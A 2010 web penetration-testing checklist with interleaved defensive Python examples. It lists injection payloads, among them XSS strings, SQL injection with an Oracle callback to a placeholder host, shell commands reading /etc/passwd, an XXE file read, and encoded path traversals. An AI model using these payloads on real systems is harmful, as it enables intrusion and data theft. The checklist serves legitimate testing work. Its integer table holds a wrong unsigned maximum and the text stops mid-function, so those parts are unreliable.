@wirepair
Created March 20, 2019 22:54
super old pen-testing checklist
Attack Vector Checklist v1.2 Mar 23rd 2010
-----------------------------------
target site: [ ]
user accounts: [ ]
/*****************************************************************************/
/* AUTHENTICATION */
/*****************************************************************************/
1. Bypass transaction authentication by spoofing
------
[ ] Attempt modification of user supplied parameters in accessing stored data
[ ] Attempt modifications of server side parameters that are used in
authentication checks.
2. Bypass transaction authentication by using alternate credentials/logic flows
------
[ ] Attempt unauthorized access by changing the order of specific expected
application calls.
3. Bypass application authentication by alternate credentials
------
[ ] Submission of modified credentials to bypass or manipulate LDAP query.
[ ] Submission of requests with modified sessions.
[ ] Submission of requests with modified session variables.
4. Bypass application authentication by directed browsing
------
[ ] Submission of URL resources observed with different roles.
[ ] Submission of URL resources as authenticated user
[ ] Submission of URL resources as an anonymous user.
5. Bypass authentication checks in web service calls
------
[ ] Submission of web service requests without credentials.
[ ] Submission of alternate credentials with web service requests.
6. Incremental or predictable user names.
------
[ ] Identify if usernames are incremental or otherwise predictable.
7. Bypass or manipulate application password reset functionality logic
------
[ ] If password reset takes an email address, attempt to inject a different
e-mail address
Ex: real@account,another@account
Ex: another@account.com@real@account.com
Ex: real@account.com%0d%0aRCPT%20TO:another@account.com
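The three reset-address payloads above all rely on the application mailing whatever string the requester typed. The validator below is an added example (not part of the gist) showing the two controls that close this: a strict address check that refuses separators, a second "@" and percent-encoded control characters, and a reset flow that mails the address on file for the account rather than the submitted one. The accepted syntax and the `directory` lookup are assumptions for the example.

```python
import re
from typing import Dict, Optional

# Accepted address syntax for this example (an assumption, deliberately strict):
# one local part, one '@', a dotted domain, nothing else.
_EMAIL_RE = re.compile(r"^[A-Za-z0-9._+-]{1,64}@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")


def validate_reset_address(raw: str) -> str:
    """Return the address in canonical (lower-case) form or raise ValueError.

    Each rule targets one of the injection forms listed above: a second
    recipient appended after a separator, a second '@', or CRLF / SMTP
    commands smuggled in via percent-encoding.
    """
    if len(raw) > 254:
        raise ValueError("address too long")
    if raw.count("@") != 1:
        raise ValueError("exactly one '@' is required")
    if any(ch in raw for ch in ",;:\r\n\t "):
        raise ValueError("separator or control character in address")
    if "%" in raw:
        # Percent-escapes are decoded by the web layer, not accepted here:
        # '%0d%0a' (CRLF) must never reach the mail submission code.
        raise ValueError("percent-encoding is not accepted in an address")
    if not _EMAIL_RE.match(raw):
        raise ValueError("address does not match the accepted syntax")
    return raw.lower()


def is_rejected(raw: str) -> bool:
    """True when validate_reset_address refuses the input."""
    try:
        validate_reset_address(raw)
    except ValueError:
        return True
    return False


def reset_recipient(submitted: str, directory: Dict[str, str]) -> Optional[str]:
    """Password reset flow: the link goes to the mailbox ON FILE for the account,
    never to the address the requester typed. `directory` maps the canonical
    login address to the mailbox of record (constructed data in the caller)."""
    addr = validate_reset_address(submitted)
    return directory.get(addr)


if __name__ == "__main__":
    directory = {"alice@example.com": "alice@example.com"}  # constructed
    for candidate in ("Alice@Example.com",
                      "real@account,another@account",
                      "another@account.com@real@account.com",
                      "real@account.com%0d%0aRCPT%20TO:another@account.com"):
        print(candidate, "->", "rejected" if is_rejected(candidate)
              else reset_recipient(candidate, directory))
```

Even with the validator in place, mailing the address of record is the control that matters: if the submitted address is only used as a lookup key, a smuggled recipient has nowhere to go.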
8. Security question strength
------
[ ] Determine if the same security question is asked every time
until a successful attempt is made, or a random question is selected
every time
9. Account Lockout Functionality
------
[ ] Determine that multiple invalid login attempts (3 to 5) cause the account
to be locked for a specified amount of time.
Note: This should be tested at the END of the testing time frame in
the event that a manual process is required for account unlocking.
TECHNOLOGY SPECIFIC:
======
J2EE:
[ ] Attempt to bypass VBAAC using HEAD requests to protected resources
Ex: HEAD /admin/adminpage.jsp?adduser=isaac HTTP/1.0
Reference:
www.aspectsecurity.com/documents/Bypassing_VBAAC_with_HTTP_Verb_Tampering.pdf
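The HEAD bypass works because a servlet container answers HEAD with the GET handler (so the side effect still runs) while the security constraint only names the verbs it lists. The following is an added example, not code from the gist or the referenced paper: a constructed mini-router with the method-scoped check beside a deny-by-default one. The route, the `created_users` side-effect record and the verb list are assumptions for illustration.

```python
from typing import Callable, Dict, Set

# Constructed mini-application. The admin handler records its side effect in
# `created_users` so a test can observe whether a request got through.
created_users: Set[str] = set()


def admin_add_user(query: Dict[str, str]) -> str:
    created_users.add(query.get("adduser", ""))
    return "user added"


ROUTES: Dict[str, Callable[[Dict[str, str]], str]] = {
    "/admin/adminpage.jsp": admin_add_user,
}

# Vulnerable constraint (mirrors a web.xml <http-method> list): only the verbs
# named here are checked, so HEAD, or any other verb, is not subject to it.
VULNERABLE_CONSTRAINTS = {"/admin/": {"GET", "POST"}}


def vulnerable_authorize(method: str, path: str, is_admin: bool) -> bool:
    for prefix, methods in VULNERABLE_CONSTRAINTS.items():
        if path.startswith(prefix) and method in methods:
            return is_admin
    return True  # anything not matched by the list falls through: the bug


# Hardened: the constraint is method-independent and unknown verbs are refused.
PROTECTED_PREFIXES = ("/admin/",)
KNOWN_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS"}


def hardened_authorize(method: str, path: str, is_admin: bool) -> bool:
    if method not in KNOWN_METHODS:
        return False
    if path.startswith(PROTECTED_PREFIXES):
        return is_admin
    return True


def dispatch(authorize, method: str, path: str, query: Dict[str, str],
             is_admin: bool) -> int:
    """Return an HTTP status. HEAD is routed to the same handler as GET, as
    servlet containers do by default, so an authorization gap for HEAD is a
    real bypass, not a harmless metadata request."""
    if not authorize(method, path, is_admin):
        return 403
    handler = ROUTES.get(path)
    if handler is None:
        return 404
    if method in ("GET", "HEAD", "POST"):
        handler(query)
        return 200
    return 405


if __name__ == "__main__":
    req = ("HEAD", "/admin/adminpage.jsp", {"adduser": "isaac"}, False)
    print("vulnerable:", dispatch(vulnerable_authorize, *req), created_users)
    created_users.clear()
    print("hardened:  ", dispatch(hardened_authorize, *req), created_users)
```

The review point when reading a deployment descriptor is therefore whether a constraint lists methods at all; a constraint with no method list applies to every verb.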
/*****************************************************************************/
/* ACCESS CONTROL */
/*****************************************************************************/
1. Parameter manipulation in the application
------
[ ] Modification of parameters to known good values for another role.
[ ] Add user identifier parameters to pages which do not have them.
Ex: /userfiles.jsp?fileid=1
/userfiles.jsp?fileid=1&userid=1
[ ] Modification of parameters to include LDAP specific characters.
[ ] Modification of parameters to include SQL specific characters.
[ ] Modification of XML requests.
[ ] Modification of web service requests.
2. Context switching
------
[ ] Check for re-use of session IDs when logging out/into application.
[ ] Test privileges of user roles between communities.
[ ] Verify the proxy-user ability cannot be used to proxy to unauthorized accounts.
3. Inherited privilege roles
------
[ ] Test creation of new roles.
[ ] Test unauthorized access to roles during creation process.
[ ] Test for controls when granting specific data access to users.
4. Insufficient privilege dropping
------
[ ] Test logout process for a session.
5. Cross Site Request Forgery
------
[ ] Verify the application requires a non-deterministic value when making
requests to the system. This value cannot be a cookie and should be sent as a
parameter.
/*****************************************************************************/
/* CONFIGURATION/ENVIRONMENT */
/*****************************************************************************/
1. Unencrypted communication channels
------
[ ] Attempt to force the application to communicate over unencrypted channels.
2. Weak password requirements
------
[ ] Attempt to set insecure passwords.
[ ] Verify the change-password form requires the previous password.
3. Administrative interface access
------
[ ] Attempt unauthorized/unauthenticated connections to administrative
interfaces.
4. Test/QA functionality
------
[ ] Review application for QA programs.
[ ] Test external services for test/QA functionality.
[ ] Test for existence of robots.txt
5. Debug information
------
[ ] Review web pages for debug information present in source.
[ ] Search test system for accessible debug information.
6. Weak CAPTCHA implementation
------
[ ] Review captcha implementation to determine if value is predictable
[ ] Re-use previously successful captcha value on a subsequent request.
[ ] Sample and analyze CAPTCHA values to determine structure and search space.
Note: Open source tools exist for testing CAPTCHA systems:
- PWNtcha, The Captcha Breaker, Captcha decoder, Online Captcha Decoder
7. Dangerous HTTP Verbs
------
[ ] Determine if dangerous HTTP verbs such as CONNECT, TRACE, PUT are allowed.
[ ] Attempt dangerous HTTP verbs using HTTP/1.0, and without a Host: header.
8. Default Error Pages
------
[ ] Determine if the default 4xx and 5xx error pages are viewable and leak
information about the running environment.
/*****************************************************************************/
/* CRYPTOGRAPHY */
/*****************************************************************************/
1. Insufficient algorithmic entropy
------
[ ] Review configuration and ciphers available and used by the system.
[ ] Search for any non-standard or insecure ciphers used by the system.
2. Hard coded keys
------
[ ] Search code for accessible encryption keys.
3. Small key space
------
[ ] Review the size of keys used by the system.
4. Reflective attacks
------
[ ] Search applications for the exposure of cryptographic material.
[ ] Look for opportunities to have the system generate cryptographic
text controlled by the attacker.
5. Insecure encryption modes
------
[ ] If it is possible to determine the cipher in use, verify insecure modes
such as ECB mode are not in use.
/*****************************************************************************/
/* DATA EXPOSURE */
/*****************************************************************************/
1. Passwords exposed
------
[ ] Search for passwords in system scripts.
[ ] Search for passwords returned to the user in the application.
2. Accessible source code
------
[ ] Search for accessible source code on the system
[ ] Submission of special characters through the web interface to confuse the
web and application server into returning unprocessed source code.
[ ] Attempt direct access to config files and binaries through the external
interfaces.
3. Verbose comments
------
[ ] Review application pages for descriptive developer comments.
4. Dead code present on system
------
[ ] Search operating system for accessible dead or backup code
[ ] Review application pages for references/presence of dead code.
5. Sensitive information stored unencrypted
------
[ ] Search the application for sensitive information accessible in
temporary files, log files or configuration files.
6. Verbose error messages
------
[ ] Submission of unexpected user input to generate error conditions and
messages from the server;
[ ] Submission of incorrect login information to generate login errors;
[ ] Submission of file extensions to trigger application server specific
error messages;
[ ] Submission of LDAP specific characters to generate LDAP error messages.
/*****************************************************************************/
/* DATA VALIDATION */
/*****************************************************************************/
1. Path traversal in file upload functionality
------
[ ] Attempt to reference specific files in header files and in
source/destination;
[ ] Attempt to append additional files for transfer;
[ ] Attempt to modify the file request to avoid any possible filtering;
[ ] Modify requests with relative paths.
2. Path traversal in application
------
[ ] Attempt relative paths in file requests
[ ] Attempt alternate encodings of file requests.
Ex: Generic Traversal Attacks:
/../../
/./../././.././
/....//....//
\..\..\
\.\..\.\.\..\.\
\....\\....\\
Ex: Double Encoded
/%252e%252e/%252e%252e/
/%252e./%252e./
/.%252e/.%252e/
/%252e./.%252e/
/.%252e/%252e./
/%%32e%%32e/%%32e%%32e/
/%25%32e%25%32e/%25%32e%25%32e/
/..%252f../
/..%255c../
/..%%35c../
/..%%32f../
/..%25%35%63../
/..%25%32%66../
Ex: Overlong Invalid UTF-8 Sequences:
/..%c0%af../
/..%c0%2f../
/..%c1%9c../
/..%c1%1c../
/%c0%ae%c0%ae/%c0%ae%c0%ae/
/%c0%2e%c0%2e/%c0%2e%c0%2e/
/..%e0%80%af../
/..%f0%80%80%af../
/..%f8%80%80%80%af../
/..%fc%80%80%80%80%af../
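The encoded variants above exist to slip past filters that look for one spelling of "..". The added example below (not from the gist) takes the opposite approach a defender should use: decode the percent-encoding until it is stable, require strict UTF-8 so overlong sequences such as %c0%af are refused outright, normalize, and only then check that the result still lies under the document root. It goes beyond the list in that it accepts any spelling and decides by containment rather than by pattern. `BASE_DIR` is an assumed document root.

```python
import posixpath
import urllib.parse

BASE_DIR = "/srv/app/files"   # assumed document root for the example


def decode_fully(data: bytes, max_rounds: int = 4) -> bytes:
    """Percent-decode until the input stops changing, so single, double
    (%252e) and split (%25%32e, %%32e) encodings all collapse to the same bytes."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote_to_bytes(data)
        if decoded == data:
            return data
        data = decoded
    raise ValueError("too many layers of percent-encoding")


def resolve_under_base(user_path: str, base: str = BASE_DIR) -> str:
    """Canonicalize a client-supplied path and prove it stays under `base`.

    Rather than blocklisting spellings of '..', decode, normalize and then check
    containment: anything that escapes is refused however it was written, and
    '....//' style inputs that never escape are simply resolved as odd names.
    """
    raw = decode_fully(user_path.encode("utf-8"))
    if b"\x00" in raw:
        raise ValueError("NUL byte in path")
    try:
        # Strict UTF-8 rejects overlong forms such as %c0%af and %e0%80%af
        # (the 'invalid UTF-8' group above); a lenient decoder folds them to '/'.
        text = raw.decode("utf-8", errors="strict")
    except UnicodeDecodeError as exc:
        raise ValueError("invalid (possibly overlong) UTF-8 in path") from exc
    # Treat backslash as a separator too, as a Windows-hosted app would.
    text = text.replace("\\", "/")
    candidate = posixpath.normpath(posixpath.join(base, text.lstrip("/")))
    if posixpath.commonpath([base, candidate]) != base:
        raise ValueError("path escapes the base directory")
    return candidate


def is_rejected(user_path: str) -> bool:
    try:
        resolve_under_base(user_path)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for p in ("docs/readme.txt", "/../../", "/%252e%252e/%252e%252e/",
              "/..%c0%af../", "\\..\\..\\", "/....//....//"):
        print(repr(p), "->", "rejected" if is_rejected(p) else resolve_under_base(p))
```

`posixpath` is used instead of `os.path` so the result is the same on every platform; on a real deployment the final check should be done against the resolved real path (symlinks included) of the file being opened.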
3. Command injection in application
------
[ ] Attempt to bypass filters by submitting commands as part of shell calls
made by the application.
Ex: ` | && ;
[ ] Attempt to change application commands in requests.
Ex: file.pl?doc=/bin/ls|
Ex: file.pl?dir=;cat /etc/passwd
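Both `file.pl` examples above depend on the parameter being pasted into a command line that a shell then parses. As an added example (not from the gist), here is that string-building pattern next to the hardened form: an allow-list on the parameter and an argv list passed to `subprocess` with no shell, so the metacharacters in the checklist have nothing to act on. `DOC_ROOT` and the document-name syntax are assumptions.

```python
import re
import subprocess
from typing import List

DOC_ROOT = "/srv/app/docs"                                  # assumed
SAFE_DOC_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9._-]{0,63}")  # assumed policy


def vulnerable_command(doc: str) -> str:
    """The pattern the checklist item targets: the request parameter is pasted
    into a command line that is later handed to a shell (system(), shell=True).
    Every shell metacharacter in `doc` becomes part of the command."""
    return "cat " + DOC_ROOT + "/" + doc


def build_safe_argv(doc: str) -> List[str]:
    """Allow-list the parameter, then build an argv list. With no shell
    involved, '|', ';', '&&' and backticks would be ordinary characters, and
    the allow-list refuses them anyway so they never reach a filesystem call.
    The leading '.' is also excluded, which rules out '..' names."""
    if not SAFE_DOC_NAME.fullmatch(doc):
        raise ValueError("document name contains characters outside the allow-list")
    return ["cat", "--", DOC_ROOT + "/" + doc]


def is_rejected(doc: str) -> bool:
    try:
        build_safe_argv(doc)
    except ValueError:
        return True
    return False


def read_doc(doc: str) -> str:
    """Run the hardened form. shell=False is the default; it is spelled out."""
    result = subprocess.run(build_safe_argv(doc), shell=False,
                            capture_output=True, text=True, check=False)
    return result.stdout


if __name__ == "__main__":
    for payload in ("/bin/ls|", ";cat /etc/passwd", "report-2010.txt"):
        print(repr(vulnerable_command(payload)), "| safe:",
              "rejected" if is_rejected(payload) else build_safe_argv(payload))
```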
4. XSS in web interfaces
------
[ ] Submit active script into user supplied input;
Ex: <script>alert(123)</script>
Ex: <%00script>alert(123)</script>
Ex: <img src="javascript:alert(123)">
Ex: ';alert(123);
Ex: \';alert(123);
[ ] Attempt to bypass filters with different character encodings;
[ ] Search for scripting making direct use of user input.
Note: This may include areas of the DOM such as document.location.href,
window.location,document.URL etc, which can be abused by injecting script
directly into the URI query or URI fragment.
Ex: blah.jsp#<script>alert(document.cookie)</script>
5. SQL Injection
------
[ ] Include SQL relevant characters in user input
Ex: ' , " ) % %25 ' OR 1=1--
[ ] Submit valid SQL in header fields to inject into possible logging
processes.
[ ] Submit valid SQL statements in an attempt to have the system call back
in the event the injection vector does not return results. (Blind)
Ex (Oracle): '+||+UTL_HTTP.REQUEST('http://<yourip>/SqlTest')||'--
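To see why `' OR 1=1--` works and what stops it, the added example below (not from the gist) runs the same login query two ways against a constructed in-memory SQLite table: once built by string concatenation, once with bound parameters. The table and the stored hash value are constructed for the example.

```python
import sqlite3
from typing import Optional, Tuple


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory database with one account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES ('alice', 'hash-of-correct-horse')")
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str,
                     pw_hash: str) -> Optional[Tuple[str]]:
    """String concatenation: the input ' OR 1=1-- closes the quote, adds a
    tautology and comments out the password clause, so the row comes back
    without a password match."""
    query = ("SELECT username FROM users WHERE username='" + username
             + "' AND pw_hash='" + pw_hash + "'")
    return conn.execute(query).fetchone()


def safe_login(conn: sqlite3.Connection, username: str,
               pw_hash: str) -> Optional[Tuple[str]]:
    """Bound parameters: the driver sends the values separately from the SQL
    text, so a quote or comment marker in the input is just data."""
    query = "SELECT username FROM users WHERE username=? AND pw_hash=?"
    return conn.execute(query, (username, pw_hash)).fetchone()


if __name__ == "__main__":
    db = make_demo_db()
    print("vulnerable:", vulnerable_login(db, "' OR 1=1--", "wrong"))
    print("safe:      ", safe_login(db, "' OR 1=1--", "wrong"))
```

The same split applies to the header-logging and blind cases in this item: any place the application assembles SQL text from request data, including headers, needs the parameterized form.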
6. LDAP injection in auth process
------
[ ] Include LDAP relevant characters in username, password and region fields
for login requests;
Ex: ' ) * | $ &
[ ] Attempt to modify LDAP queries used in authentication to match wildcards.
Ex: uname=userA)(uid=*)
Ex: uname=userA)(&))
Reference:
http://www.blackhat.com/presentations/bh-europe-08/
Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf
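The `userA)(uid=*)` and `userA)(&))` inputs above rewrite the filter because the parentheses and wildcard are copied in verbatim. As an added example (not from the gist or the referenced paper), the function below applies the RFC 4515 filter escaping so those characters become literal bytes of the value, shown beside the concatenated form. The filter shape is assumed; checking a password inside a search filter is itself a weak design (a bind as the user is the usual pattern), and is kept here only to match the checklist item.

```python
# RFC 4515 escaping for a value placed inside an LDAP search filter.
_FILTER_ESCAPES = {"\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\x00": "\\00"}


def escape_filter_value(value: str) -> str:
    """Escape every filter metacharacter; per-character mapping means the
    backslash rule cannot be applied twice."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def vulnerable_login_filter(uname: str, password: str) -> str:
    """Concatenation: the input's ')' and '(' reshape the filter tree."""
    return "(&(uid=" + uname + ")(userPassword=" + password + "))"


def safe_login_filter(uname: str, password: str) -> str:
    """Every user-controlled value is escaped before it enters the filter."""
    return ("(&(uid=" + escape_filter_value(uname)
            + ")(userPassword=" + escape_filter_value(password) + "))")


if __name__ == "__main__":
    for payload in ("userA)(uid=*)", "userA)(&))"):
        print(vulnerable_login_filter(payload, "x"))
        print(safe_login_filter(payload, "x"))
```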
7. CRLF injection in web interfaces
------
[ ] Attempt to input CRLF content with user input
[ ] Attempt injection in application redirection flows
8. Parameter manipulation in web interfaces
------
[ ] Modify user input to modify web requests
[ ] Modify user input to modify Location/redirection. (URL Injection)
[ ] Test edge cases for input types
9. Code injection in any service
------
[ ] Identify possible injection points in web service, file service,
and backend system calls through fuzzing process.
Ex: file.php?func=echo+hi;
Ex: file.php?func=;system("/bin/ls");
10. CSRF in web interfaces
------
[ ] Review web interface request structure to determine if
non-deterministic values/tokens are used in requests.
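This item and Access Control item 5 describe the same control from two sides: the token must be unpredictable, tied to the session, and carried in a request parameter rather than a cookie. The added example below (not from the gist) is a minimal server-side implementation of that check; the `Session` class, form field name and cookie handling are assumptions for illustration.

```python
import hmac
import secrets
from typing import Dict, Iterable, Optional


class Session:
    """Server-side session; the CSRF token lives here, not in a cookie the
    browser would attach on its own."""

    def __init__(self) -> None:
        self.csrf_token = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG


def render_form(session: Session) -> Dict[str, str]:
    """Hidden fields the server embeds in its own form (constructed)."""
    return {"csrf_token": session.csrf_token}


def verify_state_change(session: Session, params: Dict[str, str],
                        cookies: Dict[str, str]) -> bool:
    """Accept a state-changing request only if the token arrived as a request
    parameter and matches the session's token. `cookies` is accepted to make
    the point explicit: it is deliberately not consulted, because a cross-site
    request carries the victim's cookies automatically."""
    submitted: Optional[str] = params.get("csrf_token")
    if not submitted:
        return False
    # Constant-time comparison avoids leaking the token byte by byte.
    return hmac.compare_digest(submitted, session.csrf_token)


def tokens_are_unique(tokens: Iterable[str]) -> bool:
    """Cheap sanity check for the review item: tokens must differ per session."""
    tokens = list(tokens)
    return len(set(tokens)) == len(tokens)


if __name__ == "__main__":
    s = Session()
    legit = render_form(s)
    forged = {}   # a cross-site form cannot read the token, so it sends none
    print("legit:", verify_state_change(s, legit, {"csrf_token": s.csrf_token}))
    print("forged:", verify_state_change(s, forged, {"csrf_token": s.csrf_token}))
```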
11. XML Injection
------
[ ] Include relevant XML characters in requests to the system; also attempt
to inject unbalanced XML tags.
Ex: <!-- < ' > ]]> <![CDATA[
Ex (XSS):
<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
[ ] If the application parses user-supplied XML data, attempt to inject
various invalid XML formats.
Ex (Local file reading):
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
Reference:
http://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)
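The local-file-reading payload above only works if the parser accepts a DTD and resolves the external entity. The added example below (not from the gist) is a standard-library gate for user-supplied XML: an expat pre-pass whose handlers fire on `<!DOCTYPE` and on every entity declaration, before anything is expanded or fetched, followed by the normal ElementTree parse. It refuses external entities, the nested-entity expansion variants and the blocking-device case alike. This is the same approach the defusedxml project takes; the helper names here are assumptions.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class UnsafeXML(ValueError):
    """Raised when a document declares a DTD or entities."""


def reject_dtd(data: bytes) -> None:
    """Pre-flight pass: the handlers raise on <!DOCTYPE and on every entity
    declaration. expat reports these before it would expand or fetch any
    entity, so file:///etc/passwd is never opened."""
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML("DOCTYPE is not accepted in user-supplied XML")

    def on_entity(*_args):
        raise UnsafeXML("entity declarations are not accepted")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)


def safe_fromstring(data: bytes) -> ET.Element:
    """Parse only after the gate has passed; a rejected document never reaches
    the tree builder."""
    reject_dtd(data)
    return ET.fromstring(data)


def parses_safely(data: bytes) -> bool:
    try:
        safe_fromstring(data)
    except (UnsafeXML, ET.ParseError, expat.ExpatError):
        return False
    return True


if __name__ == "__main__":
    xxe = (b'<?xml version="1.0" encoding="ISO-8859-1"?>'
           b'<!DOCTYPE foo [<!ELEMENT foo ANY >'
           b'<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>')
    print("xxe payload accepted:", parses_safely(xxe))
    print("plain document accepted:", parses_safely(b"<foo><bar>1</bar></foo>"))
```

If the application genuinely needs a DTD, the check should be narrowed to entity declarations and `ExternalEntityRefHandler` should be set to refuse resolution; rejecting the DOCTYPE outright is the simpler default for data that arrives from clients.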
TECHNOLOGY SPECIFIC
======
1. Web Services Testing
------
[ ] Identify any WSDL or other web service definition files.
Ex:
http://<webservice-host>:<port>/<servicename>
http://<webservice-host>:<port>/<servicename>.wsdl
http://<webservice-host>:<port>/<servicename>?wsdl
http://<webservice-host>:<port>/<servicename>.aspx?wsdl
http://<webservice-host>:<port>/<servicename.dll>?wsdl
http://<webservice-host>:<port>/<servicename.exe>?wsdl
http://<webservice-host>:<port>/<servicename.php>?wsdl
http://<webservice-host>:<port>/<servicename.pl>?wsdl
http://<webservice-host>:<port>/<servicename.dll>?disco
http://<webservice-host>:<port>/<servicename.exe>?disco
http://<webservice-host>:<port>/<servicename.php>?disco
http://<webservice-host>:<port>/<servicename.pl>?disco
http://<webservice-host>:<port>/axis/services/<servicename>?wsdl
http://<webservice-host>:<port>/axis/services/<service-name>
http://<webservice-host>:<port>/<servlets>/<servicename>?wsdl
http://<webservice-host>:<port>/<servlets>/<service-name>
2. Cross-Site Flashing
------
[ ] Using FLARE, decompile Flash movies and determine if the following
methods exist, as they are known to be vulnerable to XSF attacks.
loadVariables()
loadMovie()
getURL()
loadMovie()
loadMovieNum()
FScrollPane.loadScrollContent()
LoadVars.load
LoadVars.send
XML.load ( 'url' )
LoadVars.load ( 'url' )
Sound.loadSound( 'url' , isStreaming );
NetStream.play( 'url' );
flash.external.ExternalInterface.call(_root.callback)
htmlText
asfunction
*The below example assumes the URL variable is defined.
Ex: http://victim/file.swf?URL=asfunction:getURL,javascript:alert(123);
Reference:
http://www.owasp.org/index.php/Testing_for_Cross_site_flashing_(OWASP-DV-004)
/*****************************************************************************/
/* DATA HANDLING */
/*****************************************************************************/
1. Buffer overflows in accessible services
------
[ ] Generate varied length strings submitted through different input to
generate errors/failures in services.
2. Heap overflows in accessible services
------
[ ] Submit varied length strings for user supplied data to surface any
error/failure in services.
3. Format string attacks in accessible services
------
[ ] Submit format strings to services to generate error conditions.
Ex: %x %25x %p %04d
4. Alternate character encodings
------
[ ] Submit data with different character encodings to bypass filtering.
5. Data truncation
------
[ ] Submit varied length strings to filtered content to check for proper
validation and truncation processes.
6. Integer overflows/underflows
------
[ ] Submit edge cases for integer values to surface any potential integer
overflow/underflow conditions in the application logic.
Ex: 128, 129, 256, 257, 32768, 32769, 65536, 65537, 2147483648, 2147483649
4294967296, 4294967297
Reference:
type                 min                   max
signed char          -128                  127
unsigned char        0                     255
short                -32768                32767
unsigned short       0                     65535
int                  -2147483648           2147483647
unsigned int         0                     4294967295
long                 -2147483648           2147483647
unsigned long        0                     4294967295
long long            -9223372036854775808  9223372036854775807
unsigned long long   0                     18446774073709551615
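Rather than copying limits from a table, the added example below (not from the gist) derives each range from its bit width and signedness, generates the values just inside and just outside each limit (the general form of the "Ex:" list above), and shows the defensive counterpart: a parser that refuses input outside the target type's range before it reaches code that would silently wrap. The widths follow the table, with `long` taken as 32 bits; that is platform dependent (64 bits on LP64 Linux and macOS, 32 on 64-bit Windows), so it is an assumption.

```python
import re
from typing import Dict, List, Tuple

# Widths as in the table above (long = 32 bits, an ILP32/LLP64 assumption).
C_TYPES: Dict[str, Tuple[int, bool]] = {
    "signed char": (8, True),   "unsigned char": (8, False),
    "short": (16, True),        "unsigned short": (16, False),
    "int": (32, True),          "unsigned int": (32, False),
    "long": (32, True),         "unsigned long": (32, False),
    "long long": (64, True),    "unsigned long long": (64, False),
}

_DECIMAL = re.compile(r"[+-]?[0-9]+")


def c_range(bits: int, signed: bool) -> Tuple[int, int]:
    """Two's-complement range for a type of the given width."""
    if signed:
        return -(1 << (bits - 1)), (1 << (bits - 1)) - 1
    return 0, (1 << bits) - 1


def boundary_values(ctype: str) -> List[int]:
    """Values worth feeding an integer field for a given type: just inside and
    just outside each limit. lo-1 for an unsigned type is -1, which is the
    classic sign-confusion input."""
    lo, hi = c_range(*C_TYPES[ctype])
    return sorted({lo - 1, lo, lo + 1, hi - 1, hi, hi + 1})


def parse_bounded_int(text: str, ctype: str) -> int:
    """Defensive side: parse decimal input and refuse anything outside the
    target type's range. Python ints never overflow, so the comparison is
    exact; the wrap would happen later in C, SQL or a length field."""
    text = text.strip()
    if not _DECIMAL.fullmatch(text):
        raise ValueError("not a decimal integer")
    value = int(text)
    lo, hi = c_range(*C_TYPES[ctype])
    if not lo <= value <= hi:
        raise ValueError(f"{value} is outside {ctype} range [{lo}, {hi}]")
    return value


def fits(text: str, ctype: str) -> bool:
    try:
        parse_bounded_int(text, ctype)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    for name in C_TYPES:
        print(f"{name:20s} {c_range(*C_TYPES[name])}  edges: {boundary_values(name)}")
```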
/*****************************************************************************/
/* ERROR REPORTING */
/*****************************************************************************/
1. DB errors exposed
------
[ ] Modify user supplied input to include erroneous DB input
2. Stack traces returned to the user
------
[ ] Modify user input and look for stack traces in error messages, header
parameters or in page source returned to the user.
3. System errors exposed to the user
------
[ ] Review error messages returned to the user for the presence of system error
messages.
4. Authentication error messages
------
[ ] Review failed login attempts for descriptive error messages.
/*****************************************************************************/
/* SESSION MANAGEMENT */
/*****************************************************************************/
1. Session fixation attacks
------
[ ] Attempt to preset session in login call;
[ ] Attempt to preset session in cookie;
[ ] Attempt to preset session in parameters.
2. Insecure cookie creation
------
[ ] Review all cookie creation calls from the server.
3. Insecure cookie usage
------
[ ] Validate cookie information is not used in displaying content back to the
user.
- Add cookie to uri (url rewriting format):
/file.jsp;errcookie=<script>alert(123)</script>
4. Session IDs predictable
------
[ ] Sample and analyze sessionID for randomness in session ID creation process.
* Burp Sequencer has a decent built-in tool for session ID analysis.
5. Session IDs searchable
------
[ ] Sample and analyze sessionIDs to determine structure and search space.
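Items 4 and 5 both come down to sampling IDs and measuring how much of each one actually varies. The added example below (not from the gist, and not Burp's method) computes a per-position Shannon entropy estimate over a sample and a simple sequential-order check, run on two constructed ID generators: a zero-padded counter and `secrets.token_hex`. The estimate is a lower bound capped at log2(sample size) per position, so it exposes fixed or slowly changing fields but cannot prove randomness.

```python
import math
import secrets
from collections import Counter
from typing import List


def estimated_entropy_bits(samples: List[str]) -> float:
    """Sum over character positions of the Shannon entropy seen in the sample.
    Each position contributes at most log2(len(samples)) bits, so with 1024
    samples a truly random hex ID shows just under 4 bits per character."""
    n = len(samples)
    width = len(samples[0])
    if any(len(s) != width for s in samples):
        raise ValueError("samples must have equal length")
    total = 0.0
    for i in range(width):
        counts = Counter(s[i] for s in samples)
        total -= sum((c / n) * math.log2(c / n) for c in counts.values())
    return total


def looks_sequential(samples: List[str]) -> bool:
    """Flag IDs that parse as numbers strictly increasing in capture order."""
    try:
        nums = [int(s, 16) for s in samples]
    except ValueError:
        return False
    return all(b > a for a, b in zip(nums, nums[1:]))


def predictable_ids(n: int) -> List[str]:
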